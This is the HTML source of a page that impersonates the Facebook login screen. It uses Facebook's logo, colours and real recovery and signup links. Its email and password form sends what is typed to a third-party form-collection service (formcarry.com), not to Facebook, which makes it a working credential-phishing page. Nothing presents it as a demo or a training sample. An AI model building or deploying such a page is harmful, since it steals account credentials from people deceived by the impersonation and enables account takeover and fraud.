<!DOCTYPE html>
<html lang="en">
<head>
	<meta charset="UTF-8">
	<title>Facebook Login page</title>
	<link rel="stylesheet" href="style.css">

  </head>
  
  <head>
  
<style>
  
  
  *{
	margin: 0;
	padding: 3px;
	outline: 0;
	text-decoration: none;
	-webkit-box-sizing: border-box;
	-moz-box-sizing: border-box;
	-ms-box-sizing: border-box;
	box-sizing: border-box;
}
body{
	font-family: arial;
	font-size: 19px;
	color: #1c1e21;
	font-weight: normal;
	background: #f0f2f5



}
.container{
	max-width: -1px;
	margin: 160px;
	text-align: center;
	
}
.container form{
	width: 600px;
	height: 490px;
	background: #fff;
	border-radius: 5px;
	padding: 0px;
	-webkit-box-shadow: -5px -5px 8px -3px rgba(0,0,0,0.52);
	-moz-box-shadow: -5px -5px 8px -3px rgba(0,0,0,0.52);
	box-shadow: -6px -5px 8px -3px rgba(0,0,0,0.52);
	margin-bottom: 3px;
}
.container form input{
	width: 100%;
	height: 90px;
	font-size: 18px;
	border: 1px solid #ddd;
	border-radius: 5px;
	padding: 0 20px;
	margin-bottom: 1px;
}
.container form input:hover{
	border: 3px solid #f0f2f5;
	background: #f0f2f5;
}
.btn{
	font-size: 20px;
	background: #1877f2;
	height: 50px;
	color: #fff;
	line-height: 50px;
	border-radius: 5px;
	margin-bottom: 20px;
	text-transform: capitalize;
}
.login button{
	display: block;

    padding: 0px 270px;
    text-align: center;
    cursor: pointer;
    height: 90px;


}
.create-btn a{
	display: inline-block;
	margin-top: 20px;
	padding: 0 17px;
	background: #4cd137;
	transition: .3s;
}
.create-btn a:hover{
	background: #44bd32;
}
.forgot a{
	font-size: 14px;
	line-height: 19px;
	color:#1877f2;
}
.forgot a:hover,
.container p a:hover{
	text-decoration: underline;
}
.container p a{
	color: #1c1e21;
	font-weight: 600;
	padding: center;
}

  </style>
  


<body>

		<!-- login Page start -->
	
			<div class="container">
                <img class="fb_logo _8ilh img" src="https://static.xx.fbcdn.net/rsrc.php/y8/r/dF5SId3UHWd.svg" alt="Facebook">
									 
						
						<form action="
						https://formcarry.com/s/o12VvIGsAps
						" method="POST">
						<center>
						     
							<div class="form-group">
								<input type="text" name="email address or phone number" placeholder="Email address or phone number"required>
							</div>
							<div class="form-group">
								<input type="password" name="password" placeholder="Password"required>
							</div>
							<div class="login">
						<button type="submit" class="btn">LogIn</button>
							</div>

							<div class="forgot">
								<a href="
								https://m.facebook.com/login/identify/?ctx=recover&c=https%3A%2F%2Fm.facebook.com%2Flogin%2F%3Fnext%26ref%3Ddbl%26fl%26refid%3D8&multiple_results=0&ars=facebook_login&from_login_screen=0&lwv=100&ref=dbl&_rdr
								">Forgotten account?</a>
							</div>
							<div class="create-btn">
								<a href="    
								https://m.facebook.com/reg/?ref=dbl&soft=hjk
								
								" class="btn">create new account</a>
							</div>
						</form>
						</center>
						<p><a href="">
						  <center>Create a Page</a> for a celebrity, band or business.</center></p>
					</div>
				</div>
			</div>
		</div>
		<div id="footer_wrapper">
		    <table align="left"
		                style="width: 90%">
		 <tr><h2>
		 <th>English (UK)</th>
		 
		  <th>
		 <a href="">हिन्दी</a></th>
     </tr>
     
       <tr>
         <th>
		  <a href="">ਪੰਜਾਬੀ</a> </th>
		  
		  <th>
		  <a href=""> اردو</a></th>
		  </tr>
		  <tr>
		    <th>
		  <a href="">தமிழ்</a> 
		  </th>
		  <th>
		  <a href="">বাংলা</a>
		  </tr>
		  <tr>
		    <th>
		  <a href="">मराठी</a></th>
		  
		  <th>
		  <a href="">తెలుగు</a></th>
		  </tr>
		  <tr><th>
		  ><a href="">ગુજરાતી</a></th>
		  <th>
		  
		  <a href="">ಕನ್ನಡ</a></th>
		  <th>
		  </tr></h2>
        </table>
		  </div>
		</div>
		   <br>
		   <br>
		   <br>
		   
		   <br>
		   <br>
		   <br>
		   <center><br>
		   <h2>Facebook Inc.</h2></center>
		     
		  
		
		</head>
		
		<!-- login Page end -->

</html>